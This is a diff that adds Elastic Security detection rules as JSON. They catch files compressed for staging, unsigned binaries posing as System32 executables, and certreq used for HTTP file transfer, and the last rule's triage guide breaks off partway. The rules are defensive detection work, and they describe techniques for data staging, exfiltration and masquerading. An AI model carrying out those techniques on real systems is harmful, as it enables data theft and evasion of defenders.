+ "rule_id": "79124edf-30a8-4d48-95c4-11522cad94b1", + "severity": "low", + "tags": [ + "Data Source: Elastic Defend", + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Tactic: Collection", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1074", + "name": "Data Staged", + "reference": "https://attack.mitre.org/techniques/T1074/", + "subtechnique": [ + { + "id": "T1074.001", + "name": "Local Data Staging", + "reference": "https://attack.mitre.org/techniques/T1074/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1132", + "name": "Data Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/", + "subtechnique": [ + { + "id": "T1132.001", + "name": "Standard Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "79124edf-30a8-4d48-95c4-11522cad94b1_2", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json
new file mode 100644
index 00000000000..35a804295ae
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json
@@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects files being compressed or archived into common formats. This is a common technique used to obfuscate files to evade detection or to staging data for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "File Compressed or Archived into Common Format", + "query": "file where event.type in (\"creation\", \"change\") and process.executable != null and not user.id : \"S-1-5-18\" and\n file.Ext.header_bytes : (\n /* compression formats */\n \"1F9D*\", /* tar zip, tar.z (Lempel-Ziv-Welch algorithm) */\n \"1FA0*\", /* tar zip, tar.z (LZH algorithm) */\n \"425A68*\", /* Bzip2 */\n \"524E4301*\", /* Rob Northen Compression */\n \"524E4302*\", /* Rob Northen Compression */\n \"4C5A4950*\", /* LZIP */\n \"504B0*\", /* ZIP */\n \"526172211A07*\", /* RAR compressed */\n \"44434D0150413330*\", /* Windows Update Binary Delta Compression file */\n \"50413330*\", /* Windows Update Binary Delta Compression file */\n \"377ABCAF271C*\", /* 7-Zip */\n \"1F8B*\", /* GZIP */\n \"FD377A585A00*\", /* XZ, tar.xz */\n \"7801*\",\t /* zlib: No Compression (no preset dictionary) */\n \"785E*\",\t /* zlib: Best speed (no preset dictionary) */\n \"789C*\",\t /* zlib: Default Compression (no preset dictionary) */\n \"78DA*\", \t /* zlib: Best Compression (no preset dictionary) */\n \"7820*\",\t /* zlib: No Compression (with preset dictionary) */\n \"787D*\",\t /* zlib: Best speed (with preset dictionary) */\n \"78BB*\",\t /* zlib: Default Compression (with preset dictionary) */\n \"78F9*\",\t /* zlib: Best Compression (with preset dictionary) */\n \"62767832*\", /* LZFSE */\n \"28B52FFD*\", /* Zstandard, zst */\n \"5253564B44415441*\", /* QuickZip rs compressed archive */\n \"2A2A4143452A2A*\", /* ACE */\n\n /* archive formats */\n \"2D686C302D*\", /* 
lzh */\n \"2D686C352D*\", /* lzh */\n \"303730373037*\", /* cpio */\n \"78617221*\", /* xar */\n \"4F4152*\", /* oar */\n \"49536328*\" /* cab archive */\n ) and\n not (\n (\n process.name : \"firefox.exe\" and\n process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true\n ) or\n (\n process.name : \"wazuh-agent.exe\" and\n process.code_signature.subject_name : \"Wazuh, Inc\" and process.code_signature.trusted == true and\n file.name : (\"ossec-*.log.gz\", \"tmp-entry.gz\", \"tmp-entry\", \"last-entry.gz\")\n ) or\n (\n process.name : \"excel.exe\" and\n process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true and\n file.extension : (\"tmp\", \"xlsx\", \"gz\", \"xlsb\", \"xar\", \"xslm\")\n ) or\n (\n process.name : \"Dropbox.exe\" and\n process.code_signature.subject_name : \"Dropbox, Inc\" and process.code_signature.trusted == true and\n file.name : \"store.bin\"\n ) or\n (\n process.name : \"DellSupportAssistRemedationService.exe\" and\n process.code_signature.subject_name : \"Dell Inc\" and process.code_signature.trusted == true and\n file.extension : \"manifest\"\n )\n )\n", + "references": [ + "https://en.wikipedia.org/wiki/List_of_file_signatures" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, 
+ "rule_id": "79124edf-30a8-4d48-95c4-11522cad94b1", + "severity": "low", + "tags": [ + "Data Source: Elastic Defend", + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Tactic: Collection", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1074", + "name": "Data Staged", + "reference": "https://attack.mitre.org/techniques/T1074/", + "subtechnique": [ + { + "id": "T1074.001", + "name": "Local Data Staging", + "reference": "https://attack.mitre.org/techniques/T1074/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1132", + "name": "Data Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/", + "subtechnique": [ + { + "id": "T1132.001", + "name": "Standard Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "79124edf-30a8-4d48-95c4-11522cad94b1_3", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json
new file mode 100644
index 00000000000..60605afd5c9
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as System32 Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n (process.code_signature.status : \"?*\" or process.code_signature.exists != null) and\n process.name: (\n \"agentactivationruntimestarter.exe\", \"agentservice.exe\", \"aitstatic.exe\", \"alg.exe\", \"apphostregistrationverifier.exe\", \"appidcertstorecheck.exe\", \"appidpolicyconverter.exe\", \"appidtel.exe\", \"applicationframehost.exe\", \"applysettingstemplatecatalog.exe\", \"applytrustoffline.exe\", \"approvechildrequest.exe\", \"appvclient.exe\", \"appvdllsurrogate.exe\", \"appvnice.exe\", \"appvshnotify.exe\", \"arp.exe\", \"assignedaccessguard.exe\", \"at.exe\", \"atbroker.exe\", \"attrib.exe\", \"audiodg.exe\", \"auditpol.exe\", \"authhost.exe\", \"autochk.exe\", \"autoconv.exe\", \"autofmt.exe\", \"axinstui.exe\", \"baaupdate.exe\", \"backgroundtaskhost.exe\", \"backgroundtransferhost.exe\", \"bcdboot.exe\", \"bcdedit.exe\", \"bdechangepin.exe\", \"bdehdcfg.exe\", \"bdeuisrv.exe\", \"bdeunlock.exe\", \"bioiso.exe\", \"bitlockerdeviceencryption.exe\", \"bitlockerwizard.exe\", \"bitlockerwizardelev.exe\", \"bitsadmin.exe\", \"bootcfg.exe\", \"bootim.exe\", \"bootsect.exe\", \"bridgeunattend.exe\", \"browserexport.exe\", \"browser_broker.exe\", \"bthudtask.exe\", \"bytecodegenerator.exe\", \"cacls.exe\", \"calc.exe\", \"camerasettingsuihost.exe\", \"castsrv.exe\", \"certenrollctrl.exe\", \"certreq.exe\", \"certutil.exe\", \"change.exe\", 
\"changepk.exe\", \"charmap.exe\", \"checknetisolation.exe\", \"chglogon.exe\", \"chgport.exe\", \"chgusr.exe\", \"chkdsk.exe\", \"chkntfs.exe\", \"choice.exe\", \"cidiag.exe\", \"cipher.exe\", \"cleanmgr.exe\", \"cliconfg.exe\", \"clip.exe\", \"clipup.exe\", \"cloudexperiencehostbroker.exe\", \"cloudnotifications.exe\", \"cmd.exe\", \"cmdkey.exe\", \"cmdl32.exe\", \"cmmon32.exe\", \"cmstp.exe\", \"cofire.exe\", \"colorcpl.exe\", \"comp.exe\", \"compact.exe\", \"compattelrunner.exe\", \"compmgmtlauncher.exe\", \"comppkgsrv.exe\", \"computerdefaults.exe\", \"conhost.exe\", \"consent.exe\", \"control.exe\", \"convert.exe\", \"convertvhd.exe\", \"coredpussvr.exe\", \"credentialenrollmentmanager.exe\", \"credentialuibroker.exe\", \"credwiz.exe\", \"cscript.exe\", \"csrss.exe\", \"ctfmon.exe\", \"cttune.exe\", \"cttunesvr.exe\", \"custominstallexec.exe\", \"customshellhost.exe\", \"dashost.exe\", \"dataexchangehost.exe\", \"datastorecachedumptool.exe\", \"dccw.exe\", \"dcomcnfg.exe\", \"ddodiag.exe\", \"defrag.exe\", \"deploymentcsphelper.exe\", \"desktopimgdownldr.exe\", \"devicecensus.exe\", \"devicecredentialdeployment.exe\", \"deviceeject.exe\", \"deviceenroller.exe\", \"devicepairingwizard.exe\", \"deviceproperties.exe\", \"dfdwiz.exe\", \"dfrgui.exe\", \"dialer.exe\", \"directxdatabaseupdater.exe\", \"diskpart.exe\", \"diskperf.exe\", \"diskraid.exe\", \"disksnapshot.exe\", \"dism.exe\", \"dispdiag.exe\", \"displayswitch.exe\", \"djoin.exe\", \"dllhost.exe\", \"dllhst3g.exe\", \"dmcertinst.exe\", \"dmcfghost.exe\", \"dmclient.exe\", \"dmnotificationbroker.exe\", \"dmomacpmo.exe\", \"dnscacheugc.exe\", \"doskey.exe\", \"dpapimig.exe\", \"dpiscaling.exe\", \"dpnsvr.exe\", \"driverquery.exe\", \"drvinst.exe\", \"dsmusertask.exe\", \"dsregcmd.exe\", \"dstokenclean.exe\", \"dusmtask.exe\", \"dvdplay.exe\", \"dwm.exe\", \"dwwin.exe\", \"dxdiag.exe\", \"dxgiadaptercache.exe\", \"dxpserver.exe\", \"eap3host.exe\", \"easeofaccessdialog.exe\", \"easinvoker.exe\", 
\"easpolicymanagerbrokerhost.exe\", \"edpcleanup.exe\", \"edpnotify.exe\", \"eduprintprov.exe\", \"efsui.exe\", \"ehstorauthn.exe\", \"eoaexperiences.exe\", \"esentutl.exe\", \"eudcedit.exe\", \"eventcreate.exe\", \"eventvwr.exe\", \"expand.exe\", \"extrac32.exe\", \"fc.exe\", \"fclip.exe\", \"fhmanagew.exe\", \"filehistory.exe\", \"find.exe\", \"findstr.exe\", \"finger.exe\", \"fixmapi.exe\", \"fltmc.exe\", \"fodhelper.exe\", \"fondue.exe\", \"fontdrvhost.exe\", \"fontview.exe\", \"forfiles.exe\", \"fsavailux.exe\", \"fsiso.exe\", \"fsquirt.exe\", \"fsutil.exe\", \"ftp.exe\", \"fvenotify.exe\", \"fveprompt.exe\", \"gamebarpresencewriter.exe\", \"gamepanel.exe\", \"genvalobj.exe\", \"getmac.exe\", \"gpresult.exe\", \"gpscript.exe\", \"gpupdate.exe\", \"grpconv.exe\", \"hdwwiz.exe\", \"help.exe\", \"hostname.exe\", \"hvax64.exe\", \"hvix64.exe\", \"hvsievaluator.exe\", \"icacls.exe\", \"icsentitlementhost.exe\", \"icsunattend.exe\", \"ie4uinit.exe\", \"ie4ushowie.exe\", \"iesettingsync.exe\", \"ieunatt.exe\", \"iexpress.exe\", \"immersivetpmvscmgrsvr.exe\", \"infdefaultinstall.exe\", \"inputswitchtoasthandler.exe\", \"iotstartup.exe\", \"ipconfig.exe\", \"iscsicli.exe\", \"iscsicpl.exe\", \"isoburn.exe\", \"klist.exe\", \"ksetup.exe\", \"ktmutil.exe\", \"label.exe\", \"languagecomponentsinstallercomhandler.exe\", \"launchtm.exe\", \"launchwinapp.exe\", \"legacynetuxhost.exe\", \"licensemanagershellext.exe\", \"licensingdiag.exe\", \"licensingui.exe\", \"locationnotificationwindows.exe\", \"locator.exe\", \"lockapphost.exe\", \"lockscreencontentserver.exe\", \"lodctr.exe\", \"logagent.exe\", \"logman.exe\", \"logoff.exe\", \"logonui.exe\", \"lpkinstall.exe\", \"lpksetup.exe\", \"lpremove.exe\", \"lsaiso.exe\", \"lsass.exe\", \"magnify.exe\", \"makecab.exe\", \"manage-bde.exe\", \"mavinject.exe\", \"mbaeparsertask.exe\", \"mblctr.exe\", \"mbr2gpt.exe\", \"mcbuilder.exe\", \"mdeserver.exe\", \"mdmagent.exe\", \"mdmappinstaller.exe\", \"mdmdiagnosticstool.exe\", 
\"mdres.exe\", \"mdsched.exe\", \"mfpmp.exe\", \"microsoft.uev.cscunpintool.exe\", \"microsoft.uev.synccontroller.exe\", \"microsoftedgebchost.exe\", \"microsoftedgecp.exe\", \"microsoftedgedevtools.exe\", \"microsoftedgesh.exe\", \"mmc.exe\", \"mmgaserver.exe\", \"mobsync.exe\", \"mountvol.exe\", \"mousocoreworker.exe\", \"mpnotify.exe\", \"mpsigstub.exe\", \"mrinfo.exe\", \"mschedexe.exe\", \"msconfig.exe\", \"msdt.exe\", \"msdtc.exe\", \"msfeedssync.exe\", \"msg.exe\", \"mshta.exe\", \"msiexec.exe\", \"msinfo32.exe\", \"mspaint.exe\", \"msra.exe\", \"msspellcheckinghost.exe\", \"mstsc.exe\", \"mtstocom.exe\", \"muiunattend.exe\", \"multidigimon.exe\", \"musnotification.exe\", \"musnotificationux.exe\", \"musnotifyicon.exe\", \"narrator.exe\", \"nbtstat.exe\", \"ndadmin.exe\", \"ndkping.exe\", \"net.exe\", \"net1.exe\", \"netbtugc.exe\", \"netcfg.exe\", \"netcfgnotifyobjecthost.exe\", \"netevtfwdr.exe\", \"nethost.exe\", \"netiougc.exe\", \"netplwiz.exe\", \"netsh.exe\", \"netstat.exe\", \"newdev.exe\", \"ngciso.exe\", \"nltest.exe\", \"notepad.exe\", \"nslookup.exe\", \"ntoskrnl.exe\", \"ntprint.exe\", \"odbcad32.exe\", \"odbcconf.exe\", \"ofdeploy.exe\", \"omadmclient.exe\", \"omadmprc.exe\", \"openfiles.exe\", \"openwith.exe\", \"optionalfeatures.exe\", \"osk.exe\", \"pacjsworker.exe\", \"packagedcwalauncher.exe\", \"packageinspector.exe\", \"passwordonwakesettingflyout.exe\", \"pathping.exe\", \"pcalua.exe\", \"pcaui.exe\", \"pcwrun.exe\", \"perfmon.exe\", \"phoneactivate.exe\", \"pickerhost.exe\", \"pinenrollmentbroker.exe\", \"ping.exe\", \"pkgmgr.exe\", \"pktmon.exe\", \"plasrv.exe\", \"pnpunattend.exe\", \"pnputil.exe\", \"poqexec.exe\", \"pospaymentsworker.exe\", \"powercfg.exe\", \"presentationhost.exe\", \"presentationsettings.exe\", \"prevhost.exe\", \"printbrmui.exe\", \"printfilterpipelinesvc.exe\", \"printisolationhost.exe\", \"printui.exe\", \"proquota.exe\", \"provlaunch.exe\", \"provtool.exe\", \"proximityuxhost.exe\", \"prproc.exe\", 
\"psr.exe\", \"pwlauncher.exe\", \"qappsrv.exe\", \"qprocess.exe\", \"query.exe\", \"quser.exe\", \"qwinsta.exe\", \"rasautou.exe\", \"rasdial.exe\", \"raserver.exe\", \"rasphone.exe\", \"rdpclip.exe\", \"rdpinit.exe\", \"rdpinput.exe\", \"rdpsa.exe\", \"rdpsaproxy.exe\", \"rdpsauachelper.exe\", \"rdpshell.exe\", \"rdpsign.exe\", \"rdrleakdiag.exe\", \"reagentc.exe\", \"recdisc.exe\", \"recover.exe\", \"recoverydrive.exe\", \"refsutil.exe\", \"reg.exe\", \"regedt32.exe\", \"regini.exe\", \"register-cimprovider.exe\", \"regsvr32.exe\", \"rekeywiz.exe\", \"relog.exe\", \"relpost.exe\", \"remoteapplifetimemanager.exe\", \"remoteposworker.exe\", \"repair-bde.exe\", \"replace.exe\", \"reset.exe\", \"resetengine.exe\", \"resmon.exe\", \"rmactivate.exe\", \"rmactivate_isv.exe\", \"rmactivate_ssp.exe\", \"rmactivate_ssp_isv.exe\", \"rmclient.exe\", \"rmttpmvscmgrsvr.exe\", \"robocopy.exe\", \"route.exe\", \"rpcping.exe\", \"rrinstaller.exe\", \"rstrui.exe\", \"runas.exe\", \"rundll32.exe\", \"runexehelper.exe\", \"runlegacycplelevated.exe\", \"runonce.exe\", \"runtimebroker.exe\", \"rwinsta.exe\", \"sc.exe\", \"schtasks.exe\", \"scriptrunner.exe\", \"sdbinst.exe\", \"sdchange.exe\", \"sdclt.exe\", \"sdiagnhost.exe\", \"searchfilterhost.exe\", \"searchindexer.exe\", \"searchprotocolhost.exe\", \"secedit.exe\", \"secinit.exe\", \"securekernel.exe\", \"securityhealthhost.exe\", \"securityhealthservice.exe\", \"securityhealthsystray.exe\", \"sensordataservice.exe\", \"services.exe\", \"sessionmsg.exe\", \"sethc.exe\", \"setspn.exe\", \"settingsynchost.exe\", \"setupcl.exe\", \"setupugc.exe\", \"setx.exe\", \"sfc.exe\", \"sgrmbroker.exe\", \"sgrmlpac.exe\", \"shellappruntime.exe\", \"shrpubw.exe\", \"shutdown.exe\", \"sigverif.exe\", \"sihclient.exe\", \"sihost.exe\", \"slidetoshutdown.exe\", \"slui.exe\", \"smartscreen.exe\", \"smss.exe\", \"sndvol.exe\", \"snippingtool.exe\", \"snmptrap.exe\", \"sort.exe\", \"spaceagent.exe\", \"spaceman.exe\", \"spatialaudiolicensesrv.exe\", 
\"spectrum.exe\", \"spoolsv.exe\", \"sppextcomobj.exe\", \"sppsvc.exe\", \"srdelayed.exe\", \"srtasks.exe\", \"stordiag.exe\", \"subst.exe\", \"svchost.exe\", \"sxstrace.exe\", \"syncappvpublishingserver.exe\", \"synchost.exe\", \"sysreseterr.exe\", \"systeminfo.exe\", \"systempropertiesadvanced.exe\", \"systempropertiescomputername.exe\", \"systempropertiesdataexecutionprevention.exe\", \"systempropertieshardware.exe\", \"systempropertiesperformance.exe\", \"systempropertiesprotection.exe\", \"systempropertiesremote.exe\", \"systemreset.exe\", \"systemsettingsadminflows.exe\", \"systemsettingsbroker.exe\", \"systemsettingsremovedevice.exe\", \"systemuwplauncher.exe\", \"systray.exe\", \"tabcal.exe\", \"takeown.exe\", \"tapiunattend.exe\", \"tar.exe\", \"taskhostw.exe\", \"taskkill.exe\", \"tasklist.exe\", \"taskmgr.exe\", \"tcblaunch.exe\", \"tcmsetup.exe\", \"tcpsvcs.exe\", \"thumbnailextractionhost.exe\", \"tieringengineservice.exe\", \"timeout.exe\", \"tokenbrokercookies.exe\", \"tpminit.exe\", \"tpmtool.exe\", \"tpmvscmgr.exe\", \"tpmvscmgrsvr.exe\", \"tracerpt.exe\", \"tracert.exe\", \"tscon.exe\", \"tsdiscon.exe\", \"tskill.exe\", \"tstheme.exe\", \"tswbprxy.exe\", \"ttdinject.exe\", \"tttracer.exe\", \"typeperf.exe\", \"tzsync.exe\", \"tzutil.exe\", \"ucsvc.exe\", \"uevagentpolicygenerator.exe\", \"uevappmonitor.exe\", \"uevtemplatebaselinegenerator.exe\", \"uevtemplateconfigitemgenerator.exe\", \"uimgrbroker.exe\", \"unlodctr.exe\", \"unregmp2.exe\", \"upfc.exe\", \"upgraderesultsui.exe\", \"upnpcont.exe\", \"upprinterinstaller.exe\", \"useraccountbroker.exe\", \"useraccountcontrolsettings.exe\", \"userinit.exe\", \"usoclient.exe\", \"utcdecoderhost.exe\", \"utilman.exe\", \"vaultcmd.exe\", \"vds.exe\", \"vdsldr.exe\", \"verclsid.exe\", \"verifier.exe\", \"verifiergui.exe\", \"vssadmin.exe\", \"vssvc.exe\", \"w32tm.exe\", \"waasmedicagent.exe\", \"waitfor.exe\", \"wallpaperhost.exe\", \"wbadmin.exe\", \"wbengine.exe\", \"wecutil.exe\", \"werfault.exe\", 
\"werfaultsecure.exe\", \"wermgr.exe\", \"wevtutil.exe\", \"wextract.exe\", \"where.exe\", \"whoami.exe\", \"wiaacmgr.exe\", \"wiawow64.exe\", \"wifitask.exe\", \"wimserv.exe\", \"winbiodatamodeloobe.exe\", \"windows.media.backgroundplayback.exe\", \"windows.warp.jitservice.exe\", \"windowsactiondialog.exe\", \"windowsupdateelevatedinstaller.exe\", \"wininit.exe\", \"winload.exe\", \"winlogon.exe\", \"winresume.exe\", \"winrs.exe\", \"winrshost.exe\", \"winrtnetmuahostserver.exe\", \"winsat.exe\", \"winver.exe\", \"wkspbroker.exe\", \"wksprt.exe\", \"wlanext.exe\", \"wlrmdr.exe\", \"wmpdmc.exe\", \"workfolders.exe\", \"wowreg32.exe\", \"wpcmon.exe\", \"wpctok.exe\", \"wpdshextautoplay.exe\", \"wpnpinst.exe\", \"wpr.exe\", \"write.exe\", \"wscadminui.exe\", \"wscollect.exe\", \"wscript.exe\", \"wsl.exe\", \"wsmanhttpconfig.exe\", \"wsmprovhost.exe\", \"wsqmcons.exe\", \"wsreset.exe\", \"wuapihost.exe\", \"wuauclt.exe\", \"wudfcompanionhost.exe\", \"wudfhost.exe\", \"wusa.exe\", \"wwahost.exe\", \"xblgamesavetask.exe\", \"xcopy.exe\", \"xwizard.exe\", \"aggregatorhost.exe\", \"diskusage.exe\", \"dtdump.exe\", \"ism.exe\", \"ndkperfcmd.exe\", \"ntkrla57.exe\", \"securekernella57.exe\", \"spaceutil.exe\", \"configure-smremoting.exe\", \"dcgpofix.exe\", \"dcpromo.exe\", \"dimc.exe\", \"diskshadow.exe\", \"drvcfg.exe\", \"escunattend.exe\", \"iashost.exe\", \"ktpass.exe\", \"lbfoadmin.exe\", \"netdom.exe\", \"rdspnf.exe\", \"rsopprov.exe\", \"sacsess.exe\", \"servermanager.exe\", \"servermanagerlauncher.exe\", \"setres.exe\", \"tsecimp.exe\", \"vssuirun.exe\", \"webcache.exe\", \"win32calc.exe\", \"certoc.exe\", \"sdndiagnosticstask.exe\", \"xpsrchvw.exe\"\n ) and\n not (\n process.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\"\n ) and process.code_signature.trusted == true\n ) and not process.code_signature.status: (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n not\n 
(\n process.executable: (\n \"?:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\hostname.exe\",\n \"?:\\\\Windows\\\\Temp\\\\{*}\\\\taskkill.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\{*}\\\\taskkill.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\ie4ushowIE.exe\",\n \"?:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\find.exe\"\n )\n ) and\n not\n (\n (process.name: \"ucsvc.exe\" and process.code_signature.subject_name == \"Wellbia.com Co., Ltd.\" and process.code_signature.status: \"trusted\") or\n (process.name: \"pnputil.exe\" and process.code_signature.subject_name: \"Lenovo\" and process.code_signature.status: \"trusted\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": 
"https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json new file mode 100644 index 00000000000..31884caea68 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json 
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential File Transfer via Certreq", + "note": "## Triage and analysis\n\n### Investigating Potential File Transfer via Certreq\n\nCertreq is a command-line utility in Windows operating systems that allows users to request and manage certificates from certificate authorities. It is primarily used for generating certificate signing requests (CSRs) and installing certificates. However, adversaries may abuse Certreq's functionality to download files or upload data to a remote URL by making an HTTP POST request.\n\nThis rule identifies the potential abuse of Certreq to download files or upload data to a remote URL.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the details of the dropped file, and whether it was executed.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic 